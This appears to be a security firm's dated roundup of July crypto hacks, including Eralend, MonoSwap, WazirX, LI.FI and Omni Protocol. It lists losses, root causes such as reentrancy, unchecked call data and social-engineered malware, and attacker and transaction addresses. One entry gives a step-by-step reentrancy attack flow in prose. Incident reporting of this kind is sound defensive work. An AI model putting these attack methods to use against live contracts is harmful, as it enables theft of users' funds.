July 26
Table of Contents
😈On July 26, 2018, ICO platform KickICO was exploited for ~$7.7M after the hacker got access to a private key and manipulated KICK token smart contract.
A total of 70,000,000 KickCoins were stolen.
July 25
😈On July 25, 2023, Eralend, @Era_Lend a decentralized lending protocol on zkSync, was severely impacted when an attacker exploited a read-only reentrancy vulnerability, resulting in the theft of approximately $3.4 million worth of USDC from the protocol.
There was a vulnerable function in the Eralend smart contract which the exploiter called repeatedly call within a single transaction.
The attacker’s strategy involved repeatedly calling the vulnerable function to manipulate the token prices managed by the project’s internal oracle.
The vulnerability in the smart contract resulted from copying code from another contract belonging to the DEX called SyncSwap. While copying code, the vulnerability in the code was also copied, which ultimately led to the exploit, where the attacker used flash loans to rake in profits by manipulating the prices of borrowed assets.
One of the effective ways to prevent re-entrancy attacks is to implement a re-entrancy guard for smart contracts, which Eralend was not using at the time of the exploit.
Re-entrancy Attacks in the Web3 Space
Re-entrancy attacks are still prevalent in the crypto world. In the year 2024 alone, there have been 8 significant crypto exploits where re-entrancy was used to carry out the exploits. Before 2024, there were numerous attacks where re-entrancy came into play.
Look at the consolidated list of such crypto exploits here:
https://www.immunebytes.com/blog/list-of-re-entrancy-exploits-hacks-in-crypto/
July 24
😈On July 24, 2024, the decentralized exchange and staking platform MonoSwap @monoswapio on the Blast chain was exploited, resulting in a significant loss of approximately 💰$1.3M.
How the Hack Happened?
In an official post on their X handle, @monoswapio claimed that the exploit was carried out with the help of a botnet (malware), which the hackers installed on one of their developers’ office PCs while they were on a call with the developer, pretending to be VCs (Venture Capitalist) interested in making investments in the MonoSwap protocol.
Through some surreptitious or social engineering method, they were able to install the malware on the PC, which had access to literally all MonoSwap-related wallets and contracts. As soon as the hackers broke in, they drained the staked liquidity positions.
The malware infected the PC when the unaware developer downloaded a malicious app through a phishing link shared by the scammers. The malicious app looked similar to KakaoTalk, a mobile messaging app for smartphones.
The Hack Aftermath
As soon as the hack became known, MonoSwap warned its users against adding liquidity or stakes to their farming pools until the exploit was fixed.
They also advised users to withdraw their staked positions urgently to avoid losing funds in the hack.
The hack is currently being investigated, and MonoSwap will soon release updates about the hack and fund recovery.
The Total Value Locked (TLV) for this protocol dropped significantly from approximately $1.5 million to $200,000 as a result of the exploit.
The hacker withdrew funds to the address: 0x895a80371fc0e6987e27ddc7aa0e851bc3538ea8 only to bridge it to the Ethereum address: 0xd30eBC0a9AcdA91d383675EAAB3ff24f06d07eCE.
Later all the bridged fund (371 $ETH) was transferred to the Tornado Cash.
How to Avoid Getting Scammed by Crypto Scammers?
This article highlights many red-flags which can help you in identifying the fraudulent actors in the crypto space.
💡https://immunebytes.com/blog/beginners-guide-phishing-attacks/
Also, read about different types of phishing scams that are prevalent in the Web3 space.
💡https://immunebytes.com/blog/zero-value-token-transfer-phishing-attack/
💡https://immunebytes.com/blog/ice-phishing-what-is-it-and-how-does-it-jeopardize-blockchain-and-web3/
💡https://immunebytes.com/blog/what-is-address-poisoning-how-it-can-result-into-loss-of-crypto-assets/
😈On July 24, 2023, the decentralized exchange @Palmswaporg, on the Binance smart chain, was exploited for ~💰$900k by manipulating a smart contract vulnerability.
The Smart Contract Vulnerability
The primary reason for the exploit was a flaw in the calculations used to add or remove liquidity from the pool.
This calculation was made to determine the exchange rate between USDP(Palm USD) and PLP(Palm Lp).
The getAum() function, which calculated the PLP price after removing liquidity, was dependent upon the value of PoolAmount.
Due to the miscalculation, the price of PLP increased every time the buyUSDP() was called to buy USDP.
The hacker manipulated this miscalculation and made profits due to the difference in the exchange rate between USDP and PLP while removing and adding liquidity.
The analysis showed that the hacker used a buying exchange rate of 1:1, whereas the selling exchange rate was 1:1.9, which explains the profit of ~$900k.
Technical Details of the Hack:
Attacker Address: https://bscscan.com/address/0xF84efA8a9F7E68855CF17EAaC9c2f97A9d131366
Victim Contract: https://bscscan.com/address/0x55252A6D50BFAd0E5F1009541284c783686F7f25
Exploit Transaction: https://bscscan.com/tx/0x62dba55054fa628845fecded658ff5b1ec1c5823f1a5e0118601aa455a30eac9
July 18
😈In a major security breach on July 18, 2024, @WazirXIndia —one of the largest cryptocurrency exchanges in India, was hacked for an astonishing ~💰$234M.
As per the official release by WazirX India, the breach happened in one of the multisig wallets.
WazirX India is currently conducting a thorough investigation into the hack. To contain the damage caused by the exploit, the INR and crypto withdrawals have been temporarily paused.
The exploiter’s address involved in the exploit is reportedly funded by Tornado Cash.
To obfuscate the stolen funds trail, the exploiter has transferred stolen assets to multiple addresses before swapping them for Ethereum (ETH) using Uniswap.
The swapped crypto assets include $PEPE, $GALA, and $USDT.
The exploiter continues to move funds to multiple addresses even at the time of reporting this.
List of Stolen Tokens with Their Value
https://bit.ly/3Y9vOqN
Victim Address:
https://etherscan.io/address/0x27fd43babfbe83a81d14665b1a6fb8030a60c9b4
Hacker Address:
https://etherscan.io/address/0x04b21735E93Fa3f8df70e2Da89e6922616891a88
😈Other Malicious Addresses Used for Stolen Fund Movement
https://etherscan.io/address/0x35febC10112302e0d69F35F42cCe85816f8745CA (WazirX Exploiter 2)
https://etherscan.io/address/0x90ca792206eD7Ee9bc9da0d0dF981FC5619F91Fd (WazirX Exploiter 3)
https://etherscan.io/address/0x90ca571a31e9a61c2834c991051917dfa45091fd
https://etherscan.io/address/0x90ca621f8247142ae002e1b180d032dec79f91fd
July 16
😈On July 16, 2024, @lifiprotocol was exploited to steal ~💰$9.7M worth of crypto assets on the Ethereum and Arbitrum chains.
The lost funds include $USDC, $USDT, and $DAI currencies. In an official release, Team
@lifiprotocol asked its users to revoke access to the following contracts to prevent their funds from being drained.
- 0x1231deb6f5749ef6ce6943a275a1d3e7486f4eae
- 0x341e94069f53234fE6DabeF707aD424830525715
- 0xDE1E598b81620773454588B85D6b5D4eEC32573e
- 0x24ca98fB6972F5eE05f0dB00595c7f68D9FaFd68
The Root Cause
The root cause of the exploit was an unchecked external call data vulnerability in the http://Li.Fi bridge.
The depositToGasZipERC20 function in the GasZipFacet module, which swaps and deposits specified tokens for platform tokens into the GasZip contract, did not restrict any data for the external calls.
This allowed the attacker to drain the wallets of those users who had manually set infinite approvals to the vulnerable contracts.
The affected GasZipFacet module was reportedly deployed only five days before the exploit.
🚨Not the First Hack!
On March 20, 2022, @lifiprotocol lost ~$600K due to a similar vulnerability with the LI.FI smart contract. Why the current vulnerability was not fixed in various security audits, the project has undergone since has to be answered by @lifiprotocol only.
💡Ref. https://blog.li.fi/20th-march-the-exploit-e9e1c5c03eb9
The Stolen Funds Include:
- 60,715 Tether: USDT Stablecoin
- 55,001 Circle: USDC Token
- 74,795 Tether: USDT Stablecoin
- 49,820.78 Tether: USDT Stablecoin
- 48,217.283218 Circle: USDC Token
- 43.669.373674 Circle: USDC Token
- 43,166.669857 Circle: USDC Token
- 41,610.765269 Circle: USDC Token
Technical Details of the Hack
Attacker:
https://etherscan.io/address/0x8b3cb6bf982798fba233bca56749e22eec42dcf3
Attack contract:
https://etherscan.io/address/0x32d8c3b3f1496f56a74fd001b58a67036d4dfea4
Target contract:
https://etherscan.io/address/0x1231deb6f5749ef6ce6943a275a1d3e7486f4eae (LiFiDiamond)
Attack Txn:
https://etherscan.io/tx/0xa63052e97b989eecd789b76f670d6a5ed8a72334ce99831a36d7a642b087537f
July 14
😈On July 14, 2024, the cryptocurrency lending protocol @Minterest on the #mantle chain was exploited for ~💰$1.4M.
The hack investigation is currently underway to uncover the reasons behind the exploit.
Meanwhile, Minterest has temporarily paused its “Supply & Borrow” and “Repay & Withdraw” services to investigate and contain the hack.
The attacker was initially funded by the infamous
@TornadoCash
on the #ETH chain.
As per the last update, the hacker has bridged stolen funds (~$428 ETH) to #ETH.
Stolen Funds:
The stolen funds were moved to the two contract addresses by the exploiter.
👉https://mantlescan.xyz/address/0xf7628d84a2bbd9bb9c8e686ac95bb5d55169f3f1
👉https://mantlescan.xyz/address/0x4c1d3fc3fc3c177c3b633427c2f769276c547463
Was Minterest Ever Audited?
According to the blog posted on the official website on November 8, 2023, it has undergone 7 security audits by 4 different security audit companies.
Blog Ref: https://minterest.com/blog/minterest-passes-fourth-zokyo-audit/
Once the detailed hack analysis report is released and shared with the community, it will be known whether it was an insider job, compromised security keys, or a smart contract vulnerability.
Technical Details of the Hack
Hacker Address: https://mantlescan.xyz/address/0x618F768aF6291705Eb13E0B2E96600b3851911D1
Txn hash: https://mantlescan.xyz/tx/0xb3c4c313a8d3e2843c9e6e313b199d7339211cdc70c2eca9f4d88b1e155fd6bd
Exploited Contract
https://mantlescan.xyz/address/0x9b506584a0f2176494d5f9c858437b54df97bc06
July 13
😈On July 13, 2022, @space_godzilla, on the BSC chain, was exploited for ~$25.3K in a flash loan attack aided by a smart contract vulnerability (swapAndLiquifyStepv1() function).
July 12
😈On July 12, 2024, the defi @DoughFina on the #Ethereum chain has been exploited for ~💰$1.8m worth of crypto assets.
@DoughFina has already acknowledged the hack through its official X handle.
Although the hack investigation is still underway but, the likely cause behind the exploit is the access control vulnerability involving unvalidated call data in the ConnectorDeleverageParaswap contract.
💡Learn more about Access Control Vulnerabilities in smart contracts here:
https://immunebytes.com/blog/access-control-vulnerabilities-in-solidity-smart-contracts/
The attacker was initially funded through #Railgun, and at the time of this report, the hacker has already swapped all stolen $USDC into $ETH.
💡Do you know Railgun and Tornado cash are not the only tools used by hackers to obfuscate stolen funds trail? See other tools:
https://immunebytes.com/blog/top-tornado-cash-alternatives-in-2024/
Efforts of Fund Recovery
The team @DoughFina has sent an on-chain message to the hacker in a bid to open a negotiation channel with them and discuss the return of stolen funds.
In the message, the hacker has been asked to cooperate and return the stolen funds. The deadline for returning funds has been set as July 15, 2024, 23:00 UTC, failing at which, the hacker would have to bear the consequences of a legal action.
On-chain message txn.
https://etherscan.io/tx/0x38ad3247c6420518c829ff1163c36cd564de5a72b1eaf800437827365e6c4e85
Stolen funds are currently parked at https://etherscan.io/address/0x2913d90d94c9833b11a3e77f136da03075c04a0f
Technical Details of the Hack
Attacker:
https://etherscan.io/address/0x67104175fc5fabbdb5a1876c3914e04b94c71741
Attack contract:
https://etherscan.io/address/0x11a8dc866c5d03ff06bb74565b6575537b215978
Target contract:
https://etherscan.io/address/0x9f54e8eaa9658316bb8006e03fff1cb191aafbe6
Attack transaction:
https://etherscan.io/tx/0x92cdcc732eebf47200ea56123716e337f6ef7d5ad714a2295794fdc6031ebb2e
July 10
On 😈July 10, 2022, the Omni Protocol, a decentralized finance (DeFi) platform, was compromised in a significant security breach.
The exploit resulted in the loss of approximately 💰$1.4 million worth of cryptocurrency.
Reason for the Hack
The hack occurred due to a reentrancy vulnerability in Omni Protocol’s smart contract code.
Reentrancy attacks exploit the way smart contracts handle external calls, allowing an attacker to repeatedly call a function before the initial execution is complete.
This specific vulnerability was not adequately addressed in the contract’s logic, leaving it open to exploitation.
Do you know there are hundreds of crypto hacks where reentrancy was used to conduct the exploit?
Here is the list of all such hacks:
⬇️https://immunebytes.com/blog/list-of-re-entrancy-exploits-hacks-in-crypto/
Attack Flow
- Identification of Vulnerability: The attacker identified a reentrancy vulnerability in one of the Omni Protocol’s smart contracts. This vulnerability allowed the attacker to call a function repeatedly before the contract’s state was updated.
- Deploying Malicious Contract: The attacker deployed a malicious contract designed to exploit the vulnerability. This contract interacted with the vulnerable Omni Protocol contract.
- Initiating the Attack: The attacker initiated a withdrawal function from the Omni Protocol. The vulnerable contract transferred funds to the attacker’s contract before updating its own balance.
- Reentrancy Exploit: Taking advantage of the reentrancy bug, the attacker’s contract made recursive calls to the withdrawal function. Since the vulnerable contract had not yet updated its balance, it continued to transfer funds to the attacker’s contract.
- Draining Funds: The attacker repeated this process multiple times within a single transaction, rapidly draining funds from the Omni Protocol.
July 2
😈On July 2, 2024, the WMRP token contract on the #BNB chain was exploited for 103 BNB worth ~💰$58k.
The attack was carried out by manipulating the price of the MRP using a reentrancy attack.
The detailed hack analysis is underway, but executing crypto exploits using reentrancy is not a novel approach.
Look at the list of crypto hacks conducted using reentrancy in the history of Web3:
💡https://immunebytes.com/blog/list-of-re-entrancy-exploits-hacks-in-crypto/
Technical Details
Attacker:
https://bscscan.com/address/0x132d9bbdbe718365af6cc9e43bac109a9a53b138
Attack contract:
https://bscscan.com/address/0x2bd8980a925e6f5a910be8cc0ad1cff663e62d9d
Target contract:
https://bscscan.com/address/0x35f5cef517317694df8c50c894080caa8c92af7d
Exploit Txn:
https://bscscan.com/tx/0x4353a6d37e95a0844f511f0ea9300ef3081130b24f0cf7a4bd1cae26ec393101